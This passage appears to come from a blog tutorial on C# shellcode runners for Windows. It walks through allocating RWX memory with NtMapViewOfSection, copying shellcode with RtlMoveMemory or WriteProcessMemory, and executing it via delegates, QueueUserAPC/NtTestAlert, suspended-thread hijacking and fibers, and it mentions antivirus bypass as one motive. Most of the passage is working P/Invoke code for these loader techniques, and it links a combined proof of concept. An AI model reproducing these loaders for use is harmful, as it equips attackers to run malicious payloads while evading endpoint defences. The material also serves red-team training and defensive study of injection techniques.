The first argument is the handle to the section we want to map (for us, the one we just created). The second is a handle to the process we want to map the section into (we are doing this in our own process, so we can reuse the GetCurrentProcess() Win32 API to get a handle). The third is a pointer to a variable that will be populated with the virtual address of the start of the mapped view; if its value does not start as NULL, the API will attempt to use it as the starting address (in our case we don’t care where this gets mapped, so we pass in a variable set to NULL (IntPtr.Zero)). The fourth parameter states how many high bits must not be set in the base address; to be honest I’m not entirely sure what the use of this is, but we will again just pass NULL (IntPtr.Zero) for its value. The next argument states the size of the initially committed region of the view. In our case, we can ignore this and pass NULL (IntPtr.Zero) as its value.
Next is a pointer to a large integer (long) that lets us say at what offset into the section the view should start (for example, to start the view part-way into the section). In our case we don’t want to skip anything, so we simply pass a long set to 0, with the ref keyword to say we are passing a “reference” to our variable. The next argument states how big we want the view to be (in bytes, as a pointer to a SIZE_T value, which we represent as a long), so we could for example map only the first part of the section. In our case we want to map the whole thing, so we pass the size of the shellcode array (technically this value works in pages, so we won’t be mapping just the exact number of bytes).
The next argument specifies if child processes should inherit this mapped view (a SECTION_INHERIT constant), saying either to share or not to share. We aren’t using child processes that will use this map, so we pass the ViewUnmap (do not share) value of 0x2. These values can be found here.
Next is an argument specifying the allocation type of the mapped memory (similar to VirtualAlloc). However in this case, no matter what the value is (as long as it’s not MEM_RESERVE) the memory is “committed”, so we can just pass it 0, since it will do what we need anyway (slightly dodgy, but hey it works). The final argument is the memory protection; we specifically want this memory to be mapped as RWX, so we pass in PAGE_EXECUTE_READWRITE. Putting this together, to call the API we do:
long localSectionOffset = 0;
IntPtr ptrLocalSectionAddress = IntPtr.Zero;
NtMapViewOfSection(sectionHandle, GetCurrentProcess(), ref ptrLocalSectionAddress, IntPtr.Zero, IntPtr.Zero, ref localSectionOffset, ref sizeLong, 0x2, 0, PAGE_EXECUTE_READWRITE);
Now we can use ptrLocalSectionAddress as RWX memory.
For good programming practice, we should also be calling NtUnmapViewOfSection to unmap the section mapping, and NtClose() to close the section object after our shell code is finished running … but we can leave that as an exercise for the reader.
You might have also noticed that the API names start with “Nt” and the P/Invoke signature is loading these functions from “ntdll.dll” instead of “kernel32.dll” as in the other examples. This is because these are native API’s, not Win32 API’s.
Part 2 - Write memory
RtlMoveMemory
The RtlMoveMemory Win32 API lets you copy memory from one block to another block (allowing us to also specify the number of bytes to copy). The P/Invoke signature for this API is:
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
public static extern void RtlMoveMemory(IntPtr destData, IntPtr srcData, int size);
The first argument is a pointer to the destination memory (in our case the RWX memory we allocated), the second is a pointer to the source memory (in our case our shellCode array), and the third is the number of bytes to copy from the source to the destination. We do have one problem though: we need a pointer to the byte array holding our shellcode, which requires a little work, as seen below. To copy the shellCode with this API call we can run:
unsafe{
fixed (byte* p = shellCode){
IntPtr shellCodePtr = (IntPtr)p;
RtlMoveMemory(rwxMemory, shellCodePtr, shellCode.Length);
}
}
We create the pointer to our byte array (byte* p = shellCode), but we use this “fixed” code block. This specifically tells the Garbage Collector, for this section of code, DO NOT move (change the memory location of) the object on the right (shellCode) and allow us to have a pointer to it (p). If we didn’t use the fixed keyword, the pointer could quickly point somewhere random, as the Garbage Collector may have moved the exact memory location of the shellCode array, making our pointer useless.
When we start doing lower level memory operations (including messing with pointers) the CLR states that “we can no longer verify your code is ‘safe’” meaning you could do something that could crash your program (or potentially open yourself up to memory corruption vulnerabilities), without the CLR performing sanity (verifiably safe) checks first. We must specifically allow this by using the “unsafe” keyword around the block of code using the memory pointer, and must also ensure the compiler allows unsafe code (in csc.exe, this means adding the /unsafe flag).
Finally after having a pointer to our shell code array, we convert it to the IntPtr type by doing a type cast, then we can finally call the RtlMoveMemory API function, with the destination of our RWX memory, where we copy the length of the shellcode array in bytes (.Length).
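As an aside, if you would rather not compile with /unsafe, a pinned GCHandle is one alternative way to get a stable IntPtr to a managed array. This is not the approach used above, just a sketch of a different technique; the class and method names (PinDemo, ReadThroughPinnedPointer) are made up, and the example only reads a harmless byte back through the pointer to show it is valid.

```csharp
using System;
using System.Runtime.InteropServices;

public static class PinDemo
{
    // Hypothetical helper: pin the array, read one byte through the raw pointer, unpin.
    public static byte ReadThroughPinnedPointer(byte[] data, int index)
    {
        // Pinned tells the Garbage Collector not to move the array while the handle is alive.
        GCHandle handle = GCHandle.Alloc(data, GCHandleType.Pinned);
        try
        {
            // Address of the first element of the pinned array.
            IntPtr ptr = handle.AddrOfPinnedObject();
            return Marshal.ReadByte(ptr, index);
        }
        finally
        {
            // Always release the handle, otherwise the array stays pinned forever.
            handle.Free();
        }
    }

    public static void Main()
    {
        byte[] data = { 0x10, 0x20, 0x30 };
        Console.WriteLine("0x{0:X2}", ReadThroughPinnedPointer(data, 1)); // prints 0x20
    }
}
```

The trade-off is a bit more ceremony (the try/finally and the explicit Free) in exchange for not needing the unsafe keyword or the compiler flag.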
WriteProcessMemory
The WriteProcessMemory Win32 API lets you write memory from an array to a specified process (or in our case, our own). The P/Invoke signature is:
[DllImport("kernel32.dll")]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
The first argument is a handle to the process to write to (in our case, we will reuse the GetCurrentProcess Win32 API), the second is a pointer to the memory address to start writing to (the location of the RWX memory), the third is a byte array containing the data to be written (our shellcode), the fourth is the number of bytes to write (the size of the array from the previous argument) and the last argument is an output variable that will contain the number of bytes the call to WriteProcessMemory actually wrote. The call to write can be done by:
IntPtr outSize;
WriteProcessMemory(GetCurrentProcess(), rwxMemory, shellCode, shellCode.Length, out outSize);
Part 3 - Execute
Delegates
Instead of using Win32 APIs we can use a built-in feature of .NET called delegates. Delegates are type-safe references to functions: a delegate type states only a method signature (return type and parameters), and an instance of it can then be pointed at any function matching that signature. This allows you to say: hey, there will be a function later on that has this return type and these parameters, I’ll let you know where it is later (when running the code). This means we can simply say our shellcode should be treated as a function, and run it.
This is achieved by declaring a delegate type (at class or namespace level, outside of any method, much like where a DllImport declaration goes):
delegate int ShellCodeFunc();
This code specifies a new data type that represents a function which returns an int and takes no arguments. This type is called ShellCodeFunc.
Once we have this, we can use the Marshal.GetDelegateForFunctionPointer function to turn a raw function pointer (the address of a particular region of memory) into a delegate of our new type, giving us an instance of our function that we can call. Specifically we can run:
ShellCodeFunc shellCodeFunc = Marshal.GetDelegateForFunctionPointer<ShellCodeFunc>(rwxMemory);
shellCodeFunc();
The first line creates a new ShellCodeFunc object (a delegate) by using the GetDelegateForFunctionPointer function (typed to the ShellCodeFunc signature) to wrap the pointer to our RWX memory in something callable. The second line treats this object (function pointer) as a function and runs it (effectively running the shellcode stored in the RWX memory).
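If you want to see the delegate mechanism working without any shellcode involved, the same trick can be pointed at an ordinary native function. The sketch below looks up the address of GetCurrentProcessId in kernel32.dll, wraps it in a delegate, and calls it. The names DelegateDemo, GetPidFunc and CallThroughPointer are made up for this example; the Win32 functions are real.

```csharp
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

static class DelegateDemo
{
    // Delegate type describing the native function: no arguments, returns a DWORD.
    [UnmanagedFunctionPointer(CallingConvention.Winapi)]
    delegate uint GetPidFunc();

    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    // Resolves a raw function pointer and calls it through a delegate.
    public static uint CallThroughPointer()
    {
        IntPtr kernel32 = GetModuleHandle("kernel32.dll");
        IntPtr address = GetProcAddress(kernel32, "GetCurrentProcessId");
        if (address == IntPtr.Zero)
            throw new InvalidOperationException("Could not resolve GetCurrentProcessId");

        // Same call as in the article, but the pointer refers to a benign API.
        GetPidFunc getPid = Marshal.GetDelegateForFunctionPointer<GetPidFunc>(address);
        return getPid();
    }

    static void Main()
    {
        uint viaDelegate = CallThroughPointer();
        int viaFramework = Process.GetCurrentProcess().Id;
        Console.WriteLine("Delegate: {0}, Framework: {1}", viaDelegate, viaFramework);
    }
}
```

Both values should refer to the same process, which shows that the delegate really is just a typed wrapper around "whatever code lives at this address".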
QueueUserAPC
Threads have an asynchronous procedure call queue (APC queue). This is a queue that contains objects (APC objects) that a thread will execute when it enters an alertable state. These APC objects can be thought of as pointers to functions for the thread to run once it becomes alertable. This can happen, for example, when a thread calls the SleepEx or WaitForSingleObjectEx Win32 APIs with the alertable flag set. We can add an APC object to a thread’s queue by calling the QueueUserAPC Win32 API function. This will add a user-mode APC object to a specified thread’s APC queue.
We can use the APC queue to add an APC object that points to our shellcode to the executing thread (our main thread) and make it enter an alertable state, which in turn will cause the thread to run the objects within its APC queue. But how do we make a thread enter an alertable state without making it wait on some other object (e.g. another thread)? Well, there’s a native API function called NtTestAlert which will empty the calling thread’s APC queue (as if the thread had been put into an alertable state). Cool, so we can call QueueUserAPC on the current thread, and then call the NtTestAlert function to empty the APC queue and run the APC object we added.
First we get a handle to the calling thread by calling the GetCurrentThread Win32 API. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
private static extern IntPtr GetCurrentThread();
Which we can call to get the handle:
IntPtr pt = GetCurrentThread();
Now we call QueueUserAPC. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
The first argument is a pointer to the function to run (specifically, a pointer to an APC function); in our case this is the pointer to the shellcode we want to execute. The second is a handle (IntPtr) to the thread whose queue we want to add to. The last argument is the value passed to our APC function as its parameter; since we aren’t passing anything to the APC function, we just pass in a NULL pointer (IntPtr.Zero). This means we run the following to add to the queue:
IntPtr ptr = QueueUserAPC(rwxMemory, pt, IntPtr.Zero);
Lastly we call NtTestAlert to make the calling thread empty its APC queue and run the APC objects (including our shellcode APC object). The P/Invoke signature for NtTestAlert is:
[DllImport("ntdll.dll", SetLastError = true)]
public static extern IntPtr NtTestAlert();
Then we call it (finally executing our shellcode):
NtTestAlert();
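To watch the queue-then-drain flow without shellcode, you can queue a managed callback instead. The following is a minimal sketch under a few assumptions: ApcDemo, ApcCallback, OnApc and QueueAndDrain are names I made up, the return types are declared as uint (the native functions return a DWORD and an NTSTATUS respectively), and the callback just adds its parameter to a counter.

```csharp
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

static class ApcDemo
{
    // Shape of a native APC routine: one pointer-sized parameter, no return value.
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    delegate void ApcCallback(IntPtr parameter);

    [DllImport("kernel32.dll")]
    static extern IntPtr GetCurrentThread();

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);

    [DllImport("ntdll.dll")]
    static extern uint NtTestAlert();

    static int counter;

    // Benign stand-in for the code the APC points at.
    static void OnApc(IntPtr parameter)
    {
        counter += parameter.ToInt32();
    }

    // Queues one APC on the current thread, drains the queue, and returns the counter.
    public static int QueueAndDrain()
    {
        counter = 0;
        ApcCallback callback = OnApc;
        IntPtr callbackPtr = Marshal.GetFunctionPointerForDelegate(callback);

        // QueueUserAPC returns zero on failure.
        if (QueueUserAPC(callbackPtr, GetCurrentThread(), (IntPtr)1) == 0)
            throw new Win32Exception(Marshal.GetLastWin32Error());

        // Nothing has run yet; NtTestAlert makes the thread process its pending APCs.
        NtTestAlert();

        // Keep the delegate alive until the native side is done with the pointer.
        GC.KeepAlive(callback);
        return counter;
    }

    static void Main()
    {
        Console.WriteLine("Counter after draining the APC queue: {0}", QueueAndDrain());
    }
}
```

If the APC was delivered, the counter should end up equal to the value passed as dwData.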
Local Thread Hijacking
In the very first example, a thread was created that specifically pointed to the shellcode and executed on creation. Instead, we can create a thread and then, in a later step, change what instruction it’s running (or will run) by manipulating its Instruction Pointer to point to the first instruction in our shellcode. Why would we do this? It allows you to perform essentially the same action in extra steps (which can sometimes bypass AV), but mainly it’s a remote process injection technique that can also be applied to a local process.
To do this, we first create a thread in a “suspended” state by using the CreateThread API (as used above):
IntPtr hThread = CreateThread(IntPtr.Zero, 0, IntPtr.Zero, IntPtr.Zero, 0x00000004, out hThread);
The only difference between this call and the one in the original shellcode runner is that we pass 0x00000004 (CREATE_SUSPENDED) in the dwCreationFlags argument (as opposed to 0 for run immediately).
Next we want to obtain the thread’s “context”. This is a structure of type CONTEXT, which contains information such as register values for the thread. We do this because we only want to modify the Instruction Pointer register, while allowing the thread to still run without issue, by keeping the rest of its context unmodified.
The thread’s context can be obtained with the Win32 API GetThreadContext, which takes a handle to a thread and a pointer to a CONTEXT structure, and populates the CONTEXT structure with the thread’s context. The P/Invoke signature can be found here, and together with the structures it depends on is:
public enum CONTEXT_FLAGS : uint
{
CONTEXT_i386 = 0x10000,
CONTEXT_i486 = 0x10000, // same as i386
CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP
CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI
CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS
CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state
CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7
CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions
CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS
}
[StructLayout(LayoutKind.Sequential)]
public struct FLOATING_SAVE_AREA
{
public uint ControlWord;
public uint StatusWord;
public uint TagWord;
public uint ErrorOffset;
public uint ErrorSelector;
public uint DataOffset;
public uint DataSelector;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] RegisterArea;
public uint Cr0NpxState;
}
[StructLayout(LayoutKind.Sequential)]
public struct CONTEXT
{
public uint ContextFlags;
public uint Dr0;
public uint Dr1;
public uint Dr2;
public uint Dr3;
public uint Dr6;
public uint Dr7;
// Retrieved by CONTEXT_FLOATING_POINT
public FLOATING_SAVE_AREA FloatSave;
// Retrieved by CONTEXT_SEGMENTS
public uint SegGs;
public uint SegFs;
public uint SegEs;
public uint SegDs;
// Retrieved by CONTEXT_INTEGER
public uint Edi;
public uint Esi;
public uint Ebx;
public uint Edx;
public uint Ecx;
public uint Eax;
// Retrieved by CONTEXT_CONTROL
public uint Ebp;
public uint Eip;
public uint SegCs;
public uint EFlags;
public uint Esp;
public uint SegSs;
// Retrieved by CONTEXT_EXTENDED_REGISTERS
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] ExtendedRegisters;
}
// Next x64
[StructLayout(LayoutKind.Sequential)]
public struct M128A
{
public ulong High;
public long Low;
public override string ToString()
{
return string.Format("High:{0}, Low:{1}", this.High, this.Low);
}
}
/// <summary>
/// x64
/// </summary>
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct XSAVE_FORMAT64
{
public ushort ControlWord;
public ushort StatusWord;
public byte TagWord;
public byte Reserved1;
public ushort ErrorOpcode;
public uint ErrorOffset;
public ushort ErrorSelector;
public ushort Reserved2;
public uint DataOffset;
public ushort DataSelector;
public ushort Reserved3;
public uint MxCsr;
public uint MxCsr_Mask;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public M128A[] FloatRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public M128A[] XmmRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
public byte[] Reserved4;
}
/// <summary>
/// x64
/// </summary>
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct CONTEXT64
{
public ulong P1Home;
public ulong P2Home;
public ulong P3Home;
public ulong P4Home;
public ulong P5Home;
public ulong P6Home;
public CONTEXT_FLAGS ContextFlags;
public uint MxCsr;
public ushort SegCs;
public ushort SegDs;
public ushort SegEs;
public ushort SegFs;
public ushort SegGs;
public ushort SegSs;
public uint EFlags;
public ulong Dr0;
public ulong Dr1;
public ulong Dr2;
public ulong Dr3;
public ulong Dr6;
public ulong Dr7;
public ulong Rax;
public ulong Rcx;
public ulong Rdx;
public ulong Rbx;
public ulong Rsp;
public ulong Rbp;
public ulong Rsi;
public ulong Rdi;
public ulong R8;
public ulong R9;
public ulong R10;
public ulong R11;
public ulong R12;
public ulong R13;
public ulong R14;
public ulong R15;
public ulong Rip;
public XSAVE_FORMAT64 DUMMYUNIONNAME;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
public M128A[] VectorRegister;
public ulong VectorControl;
public ulong DebugControl;
public ulong LastBranchToRip;
public ulong LastBranchFromRip;
public ulong LastExceptionToRip;
public ulong LastExceptionFromRip;
}
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
Ok, so you might notice this is a much bigger P/Invoke signature; it’s not only the function signature but also all of the supporting definitions. This API call requires us to pass a pointer to a CONTEXT structure (in our case we are assuming we are running on 64 bit, so CONTEXT64), but C# does not have a CONTEXT data type, and there is no direct translation that we can use like in other cases. Instead we have to manually define the structure itself (public struct CONTEXT64), with all the fields that make up the structure (performing the same type translation as done with earlier P/Invoke signatures).
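CONTEXT64 is a big structure to start with, so here is the same idea on a much smaller one. This sketch hand-defines the Win32 SYSTEM_INFO structure and has GetSystemInfo fill it in. The wrapper names (StructDemo, Query) are mine, and the field-by-field type mapping in the comments is the translation I would use, shown for illustration only.

```csharp
using System;
using System.Runtime.InteropServices;

static class StructDemo
{
    // Manual C# definition of the native SYSTEM_INFO structure.
    // Sequential layout keeps the fields in the same order as the C declaration.
    [StructLayout(LayoutKind.Sequential)]
    public struct SYSTEM_INFO
    {
        public ushort wProcessorArchitecture;      // WORD
        public ushort wReserved;                   // WORD
        public uint dwPageSize;                    // DWORD
        public IntPtr lpMinimumApplicationAddress; // LPVOID
        public IntPtr lpMaximumApplicationAddress; // LPVOID
        public UIntPtr dwActiveProcessorMask;      // DWORD_PTR
        public uint dwNumberOfProcessors;          // DWORD
        public uint dwProcessorType;               // DWORD
        public uint dwAllocationGranularity;       // DWORD
        public ushort wProcessorLevel;             // WORD
        public ushort wProcessorRevision;          // WORD
    }

    // The API only writes to the structure, so "out" is enough here.
    // GetThreadContext needs "ref" because it also reads ContextFlags.
    [DllImport("kernel32.dll")]
    static extern void GetSystemInfo(out SYSTEM_INFO lpSystemInfo);

    public static SYSTEM_INFO Query()
    {
        SYSTEM_INFO info;
        GetSystemInfo(out info);
        return info;
    }

    static void Main()
    {
        SYSTEM_INFO info = Query();
        Console.WriteLine("Marshalled size: {0} bytes", Marshal.SizeOf(typeof(SYSTEM_INFO)));
        Console.WriteLine("Page size: {0}", info.dwPageSize);
        Console.WriteLine("Allocation granularity: {0}", info.dwAllocationGranularity);
    }
}
```

Printing Marshal.SizeOf is a cheap sanity check: if the marshalled size does not match the native sizeof for the structure, one of the field types is probably translated incorrectly.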
One specific thing to note is that the ContextFlags value within the CONTEXT structure is used, when calling GetThreadContext, to control which values are filled out within the passed structure. For example, this could be used to only return debug register values. In our case we want all values, so we set this to the CONTEXT_ALL value. These values can be found here (under constants). Note that the enum above is built on the 32-bit base value (CONTEXT_i386, 0x10000), whereas winnt.h builds the 64-bit flags on CONTEXT_AMD64 (0x100000), so it is worth checking the return value of GetThreadContext.
Now we can create a CONTEXT64 object, set its context flags to all, and pass a pointer to this object (via the ref keyword) to the GetThreadContext Win32 API, along with the handle of the newly created thread.
CONTEXT64 ctx64 = new CONTEXT64();
ctx64.ContextFlags = CONTEXT_FLAGS.CONTEXT_ALL;
GetThreadContext(hThread, ref ctx64);
Awesome, at this point the CONTEXT64 object we created should be populated with the thread’s context. We first change the value of the Instruction Pointer register (RIP) to point to our shellcode (within the RWX region), and then use another Win32 API, SetThreadContext, to set the context of the newly created thread to our CONTEXT64 object. The P/Invoke signature for SetThreadContext is:
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
It takes the same parameters as GetThreadContext but does the opposite action (setting the thread’s context to the values in the passed-in CONTEXT struct). Now we change the RIP value and set the thread’s context:
ctx64.Rip = (ulong)rwxMemory;
SetThreadContext(hThread, ref ctx64);
At this point, we have a thread that, if run, will execute our shellcode. So how do we run this suspended thread? Via the Win32 API call ResumeThread, which takes a handle to a suspended thread and resumes its execution (specifically, it decrements the thread’s suspend count, and when this reaches 0 the thread resumes execution). The P/Invoke signature for this call is:
[DllImport("kernel32.dll", SetLastError = true)]
public static extern uint ResumeThread(IntPtr hThread);
When we call this Win32 API we have the same issue as with the original shellcode runner, that is, we need to call WaitForSingleObject. Therefore, to resume the thread and wait for it to finish executing, we call:
ResumeThread(hThread);
WaitForSingleObject(hThread, 0xFFFFFFFF);
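The create-suspended, resume, then wait sequence can also be tried on its own with a harmless start routine. The sketch below is only that part of the technique: it does not touch the thread context, and the thread runs a managed callback rather than shellcode. SuspendedThreadDemo, NativeThreadStart, Work and Run are hypothetical names, and the CreateThread signature here is my own translation (UIntPtr stack size, uint thread ID), which may differ from the one used earlier in the article.

```csharp
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

static class SuspendedThreadDemo
{
    const uint CREATE_SUSPENDED = 0x00000004;
    const uint INFINITE = 0xFFFFFFFF;

    // Shape of a native thread start routine.
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    delegate uint NativeThreadStart(IntPtr parameter);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize,
        IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint ResumeThread(IntPtr hThread);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    static volatile bool ran;

    // Benign stand-in for whatever the thread is meant to execute.
    static uint Work(IntPtr parameter)
    {
        ran = true;
        return 0;
    }

    // Returns true if the thread did nothing while suspended and ran after being resumed.
    public static bool Run()
    {
        ran = false;
        NativeThreadStart start = Work;
        IntPtr startPtr = Marshal.GetFunctionPointerForDelegate(start);

        uint threadId;
        IntPtr hThread = CreateThread(IntPtr.Zero, UIntPtr.Zero, startPtr, IntPtr.Zero,
                                      CREATE_SUSPENDED, out threadId);
        if (hThread == IntPtr.Zero)
            throw new Win32Exception(Marshal.GetLastWin32Error());

        try
        {
            bool ranWhileSuspended = ran;

            // ResumeThread returns the previous suspend count, or 0xFFFFFFFF on failure.
            if (ResumeThread(hThread) == 0xFFFFFFFF)
                throw new Win32Exception(Marshal.GetLastWin32Error());

            // Block until the thread has finished.
            WaitForSingleObject(hThread, INFINITE);
            return !ranWhileSuspended && ran;
        }
        finally
        {
            CloseHandle(hThread);
            GC.KeepAlive(start); // keep the delegate alive while native code may call it
        }
    }

    static void Main()
    {
        Console.WriteLine("Thread ran only after resume: {0}", Run());
    }
}
```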
Fibers
A Fiber is a specific unit of execution that needs to be manually scheduled to run. You can think of a fiber as a specific piece of memory intended to be executed, that a thread can schedule to run. A special note is that only a fiber can schedule another fiber. We can however convert a thread into a fiber. This means we can create a fiber, that runs our shellcode, and schedule it to run by converting our main thread into a fiber.
First we convert the main thread into a fiber by calling the Win32 API ConvertThreadToFiber. This converts the calling thread into a fiber. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
static extern IntPtr ConvertThreadToFiber(IntPtr lpParameter);
The only argument to this is a pointer to a variable that the fiber can then read (sort of like a parameter). We won’t be using this, so we can just pass a NULL pointer (IntPtr.Zero). The return value for this call is the address of the fiber that was just created from converting the thread. Therefore we call:
IntPtr fiberAddress = ConvertThreadToFiber(IntPtr.Zero);
Next we need to create a fiber that will run our shellcode. To do this we use the CreateFiber Win32 API function. This function creates a new fiber, that when run will execute the code we pass in as a pointer. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
static extern IntPtr CreateFiber(uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter);
The first argument allows specifying the size of the stack. For our case, we don’t care, so we pass in 0 to make it use the process default. The next argument is a pointer to the memory location (technically to a FIBER_START_ROUTINE) containing the code we want to run (in our case, we pass in the RWX memory location of the shellcode). The third is a pointer to the parameter we want to pass to the fiber. In our case, we aren’t passing parameters so we just set this to a NULL pointer (IntPtr.Zero). The return from this call is a pointer to the new fiber.
Therefore, we create a new fiber by running:
IntPtr shellCodeFiber = CreateFiber(0, rwxMemory, IntPtr.Zero);
And lastly, we execute the newly created fiber by running the Win32 API call SwitchToFiber, which schedules a fiber to execute. This function must be called from a fiber, which is why we went to the effort of converting the main thread to a fiber. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
static extern void SwitchToFiber(IntPtr fiber);
This takes the address of the fiber to execute as its only argument, which in our case is the shellcode-running fiber we just created. Therefore we finally execute the fiber by running:
SwitchToFiber(shellCodeFiber);
GitHub link
All of the above techniques have been combined into one POC on my GitHub, located here